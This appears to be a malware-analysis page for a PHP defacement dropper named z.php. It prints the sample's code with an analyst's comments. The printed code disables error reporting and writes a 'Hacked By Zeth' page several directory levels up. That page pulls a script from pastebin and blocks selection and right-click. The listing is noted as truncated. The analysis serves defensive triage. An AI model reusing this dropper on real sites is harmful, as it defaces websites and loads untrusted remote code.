PHP Malware Analysis


Filename: z.php

Tags

URLs
Title
  • Hacked By Zeth - Eagle Cyber Army ZethEcateam - teameca - Zeth
Environment
  • error_reporting

Deobfuscated code

No deobfuscation yet...

Original code

<?php
// Analyst summary: one-statement defacement dropper. It turns off PHP error
// reporting, then writes a static HTML page to Zeth.html through a relative
// path. Nothing in this listing reads request input or runs further PHP.
//
// Triage strings taken from this listing: the output file name "Zeth.html",
// the <title> text, and the external script URL on pastebin.com referenced in
// the payload's <head>.
error_reporting(0);
// fopen() mode 'w' creates the file or truncates an existing one. The relative
// path climbs five directory levels from the process working directory,
// presumably aiming at a web root; confirm against where z.php was found.
// The fopen() result is not checked and the handle is never closed, so with
// error reporting off a failed open goes unreported.
//
// Payload notes (everything up to the closing quote is data, not PHP):
//   - it references images, fonts, jQuery and one script on third-party hosts;
//     the pastebin-hosted script is not part of this listing, so what the
//     written page does in a browser cannot be fully determined from here.
//   - the inline JavaScript blocks text selection and the context menu and
//     uses document.write() to emit small white "flake" <div> elements.
// NOTE(review): as listed, the literal contains unescaped single quotes
// (e.g. content='general') and ends in "d.documentElement!", so the listing
// looks truncated and/or stripped of backslash escapes by the page rendering.
// Verify against the raw sample before concluding whether it parses.
fwrite(fopen('../../../../../Zeth.html','w'),'<html>
<head>
<title>Hacked By Zeth - Eagle Cyber Army ZethEcateam - teameca - Zeth</title>
<meta name="Author" content="Zeth Of Eagle Cyber Army"/>
<meta name="copyright" content="Zeth"/>
<meta charset="UTF-8" />
<meta content=" HacKeD By Zeth Zeth -Eagle Cyber Army -| HiddenCoder | Mr.D0os | AntiSu | ./0ma3r | Mr.BOB | R3V0 | Zeroqueen | bl4ck_knight | 0x66 | BlurryFace | Zahrat27 | 3xcalibur | V0RT3X5 | Kaizen | HornetSource | Ascrew27 | TiGER-M@TE | Mr.Domoz | Ne0-H4cker" name="description"/>
<meta content=" HacKeD By Zeth Zeth Eagle Cyber Army,| HiddenCoder | Mr.D0os | AntiSu | ./0ma3r | Mr.BOB | R3V0 | Zeroqueen | bl4ck_knight | 0x66 | BlurryFace | Zahrat27 | 3xcalibur | V0RT3X5 | Kaizen | HornetSource | Ascrew27 | TiGER-M@TE | Mr.Domoz | Ne0-H4cker" name="keywords"/>
<meta content=" HacKeD By Zeth - Zeth Eagle Cyber Army - eca team - Eagle Cyber Army Eca , teameca , ecatea, TiGER-M@TE | Mr.Domoz | Ne0-H4cker" name="Abstract"/>
<meta name=" HacKeD By Zeth - | Yhuricka | ~Mr.GH05T | Cyb3rGh05t | HiddenCoder | AntiSu | xShadow | R0dd3CK | BlurryFace | TN.4LD4 | 3XCALIBUR | Gord1 | Mr.L~ | roosevelt |"/>
<meta property="og:image" content="http://i.imgur.com/Nivtnfu.png"/>
<meta name="language" content="en" />
<meta content='general' name='rating' />
<meta content='google' name='generator' />
<meta content='follow,all' name='msnbot' />
<meta content='follow,all' name='alexabot' />
<meta content='bangladesh' name='geo.placename' />
<meta content="index,follow,all" name="googlebot" />
<meta http-equiv="X-UA-Compatible" content="IE-edge" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link href="https://i.imgur.com/59z7cHZ.gif" rel="Shortcut Icon" />
<link href="http://fonts.googleapis.com/css?family=Orbitron:400,900" rel="stylesheet" type="text/css">
<link href='http://fonts.googleapis.com/css?family=Abel:400,700' rel='stylesheet' type='text/css'>
<script src="http://ajax.googleapis.com/…/libs/jquery/1.9.1/jquery.min.js"></script>
<script type="text/javascript" src="https://pastebin.com/raw/b3Y0FNwJ"></script>
</head>
<style type="text/css">@import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);body{background-image:url("https://i.imgur.com/5K7OpSU.jpg");background-color:black;background-repeat:fixed;background-size:99%;background-position:top center;overflow:hidden;cursor:none;margin:0px;}svg{width:600px;height:100px;display:block;position:relative;overflow:hidden;margin:0 auto;background:transparent;}text{filter:url(#filter);fill:white;font-family:'Share Tech Mono',sans-serif;font-size:100px;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;}#headM{font-family:Orbitron;position:fixed;left:0px;right:0px;bottom:0px;background:transparent;text-align:center;}.title{font-size:30px;font-family:Abel;font-weight:bold;color:#ffffff;text-shadow:0px 0px 10px black;}.title span{font-size:50px;font-family:Abel;font-weight:bold;color:#ffffff;text-shadow:0px 0px 10px black;}.greets{font-family:Abel;color:black;}.footer{font-family:Orbitron;color:white;font-size:10px;text-shadow:0px 0px 40px black;}</style>
<script type="text/javascript">
function disableselect(e) {
return false
}
function reEnable() {
return true
}
//if IE4+
document.onselectstart = new Function("return false")
//if NS6
if (window.sidebar) {
document.onmousedown = disableselect
document.onclick = reEnable
}
var message = "";
function clickIE() {
if (document.all) {
(message);
return false;
}
}
function clickNS(e) {
if (document.layers || (document.getElementById && !document.all)) {
if (e.which == 2 || e.which == 3) {
(message);
return false;
}
}
}
if (document.layers) {
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown = clickNS;
} else {
document.onmouseup = clickNS;
document.oncontextmenu = clickIE;
}
document.oncontextmenu = new Function("return false")
if ((document.getElementById) &&
window.addEventListener || window.attachEvent) {
(function() {
var num = 30;
var timer = 30;
var enableinNS6 = 1 
var y = [];
var x = [];
var fall = [];
var theFlakes = [];
var sfs = [];
var step = [];
var currStep = [];
var h, w, r;
var d = document;
var pix = "px";
var domWw = (typeof window.innerWidth == "number");
var domSy = (typeof window.pageYOffset == "number");
var idx = d.getElementsByTagName('div').length;
if (d.documentElement.style &&
typeof d.documentElement.style.MozOpacity == "string")
num = 12;
for (i = 0; i < num; i++) {
sfs[i] = Math.round(1 + Math.random() * 1);
document.write('<div id="flake' + (idx + i) + '" style="position:absolute;top:0px;left:0px;width:' + sfs[i] + 'px;height:' + sfs[i] + 'px;background-color:#ffffff;font-size:' + sfs[i] + 'px"><\/div>');
currStep[i] = 0;
fall[i] = (sfs[i] == 1) ?
Math.round(2 + Math.random() * 2) : Math.round(3 + Math.random() * 2);
step[i] = (sfs[i] == 1) ?
0.05 + Math.random() * 0.1 : 0.05 + Math.random() * 0.05;
}
if (domWw) r = window;
else {
if (d.documentElement &&
typeof d.documentElement.clientWidth == "number" &&
d.documentElement!'); ?>